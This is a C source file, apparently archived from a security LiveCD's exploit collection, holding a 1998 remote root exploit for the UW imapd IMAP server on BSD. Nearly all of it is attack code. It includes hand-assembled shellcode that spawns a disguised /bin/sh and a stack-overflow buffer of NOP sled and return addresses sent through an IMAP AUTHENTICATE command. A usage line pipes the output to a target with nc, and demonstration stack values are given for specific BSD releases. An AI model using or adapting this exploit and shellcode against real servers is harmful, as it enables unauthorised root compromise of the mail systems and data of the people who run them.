home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / imapd / imap.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.1 KB  |  101 lines
  1. /**
  2. ***  i386 BSD remote root exploit for UW imapd IMAP 4.1 server
  3. ***
  4. ***  This is *not* the same bug addressed in CERT Advisory CA-97.09!
  5. ***
  6. ***  Usage:  % (imappy nop esp offset; cat) | nc hostname 143
  7. ***
  8. ***  where nop is the number of NOP opcodes to place at the start of the
  9. ***  exploit buffer (I use 403), esp is the %esp stack pointer value, and
  10. ***  offset is the number of bytes to add to esp to calculate your target
  11. ***  %eip.
  12. ***
  13. ***  Demonstration values for UW imapd 10.234 (part of Pine 4.00):
  14. ***
  15. ***      imappy 403 0xefbfd5e8 100    (BSDI 3.0)
  16. ***      imappy 403 0xefbfd4b8 100    (FreeBSD 2.2.5)
  17. ***
  18. ***  THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
  19. ***
  20. ***  Cheez Whiz
  21. ***  cheezbeast@hotmail.com
  22. ***
  23. ***  July 16, 1998
  24. **/
  25.  
  26. #include <stdio.h>
  27. #include <stdlib.h>
  28. #include <limits.h>
  29. #include <string.h>
  30.  
  31. #define BUFLEN (2*1024)
  32. #define NOP 0x90
  33.  
  34. char shell[] =
  35.   /*  0 */ "\xeb\x34"                      /* jmp springboard        [2000]*/
  36.   /* start:                                                          [2000]*/
  37.   /*  2 */ "\x5e"                          /* popl %esi              [2000]*/
  38.   /*  3 */ "\x8d\x1e"                      /* leal (%esi),%ebx       [2000]*/
  39.   /*  5 */ "\x89\x5e\x0b"                  /* movl %ebx,0xb(%esi)    [2000]*/
  40.   /*  8 */ "\x31\xd2"                      /* xorl %edx,%edx         [2000]*/
  41.   /* 10 */ "\x89\x56\x07"                  /* movl %edx,0x7(%esi)    [2000]*/
  42.   /* 13 */ "\x89\x56\x0f"                  /* movl %edx,0xf(%esi)    [2000]*/
  43.   /* 16 */ "\x89\x56\x14"                  /* movl %edx,0x14(%esi)   [2000]*/
  44.   /* 19 */ "\x88\x56\x19"                  /* movb %dl,0x19(%esi)    [2000]*/
  45.   /* 22 */ "\x31\xc0"                      /* xorl %eax,%eax         [2000]*/
  46.   /* 24 */ "\xb0\x7f"                      /* movb $0x7f,%al         [2000]*/
  47.   /* 26 */ "\x20\x46\x01"                  /* andb %al,0x1(%esi)     [2000]*/
  48.   /* 29 */ "\x20\x46\x02"                  /* andb %al,0x2(%esi)     [2000]*/
  49.   /* 32 */ "\x20\x46\x03"                  /* andb %al,0x3(%esi)     [2000]*/
  50.   /* 35 */ "\x20\x46\x05"                  /* andb %al,0x5(%esi)     [2000]*/
  51.   /* 38 */ "\x20\x46\x06"                  /* andb %al,0x6(%esi)     [2000]*/
  52.   /* 41 */ "\xb0\x3b"                      /* movb $0x3b,%al         [2000]*/
  53.   /* 43 */ "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx    [2000]*/
  54.   /* 46 */ "\x89\xca"                      /* movl %ecx,%edx         [2000]*/
  55.   /* 48 */ "\x52"                          /* pushl %edx             [2000]*/
  56.   /* 49 */ "\x51"                          /* pushl %ecx             [2000]*/
  57.   /* 50 */ "\x53"                          /* pushl %ebx             [2000]*/
  58.   /* 51 */ "\x50"                          /* pushl %eax             [2000]*/
  59.   /* 52 */ "\xeb\x18"                      /* jmp exec               [2000]*/
  60.   /* springboard:                                                    [2000]*/
  61.   /* 54 */ "\xe8\xc7\xff\xff\xff"          /* call start             [2000]*/
  62.   /* data:                                                           [2000]*/
  63.   /* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8"  /* DATA (disguised /bin/sh)     */
  64.   /* 66 */ "\x01\x01\x01\x01"              /* DATA                   [2000]*/
  65.   /* 70 */ "\x02\x02\x02\x02"              /* DATA                   [2000]*/
  66.   /* 74 */ "\x03\x03\x03\x03"              /* DATA                   [2000]*/
  67.   /* exec:                                                           [2000]*/
  68.   /* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0          [2000]*/
  69.  
  70. char buf[BUFLEN];
  71. unsigned long int nop, esp;
  72. long int offset;
  73.  
  74. void
  75. main (int argc, char *argv[])
  76. {
  77.   int i;
  78.  
  79.   if (argc < 4)
  80.     {
  81.       printf("usage: %s nop esp offset\n", argv[0]);
  82.       return;
  83.     }
  84.  
  85.   nop = strtoul(argv[1], NULL, 0);
  86.   esp = strtoul(argv[2], NULL, 0);
  87.   offset = strtol(argv[3], NULL, 0);
  88.  
  89.   memset(buf, NOP, BUFLEN);
  90.   memcpy(buf+nop, shell, strlen(shell));
  91.   for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
  92.     *((int *) &buf[i]) = esp + offset;
  93.  
  94.   printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
  95.   for (i = 0; i < BUFLEN; i++)
  96.     putchar(buf[i]);
  97.   printf("\r\n");
  98.  
  99.   return;
  100. }
  101. /*                    www.hack.co.za              [2000]*/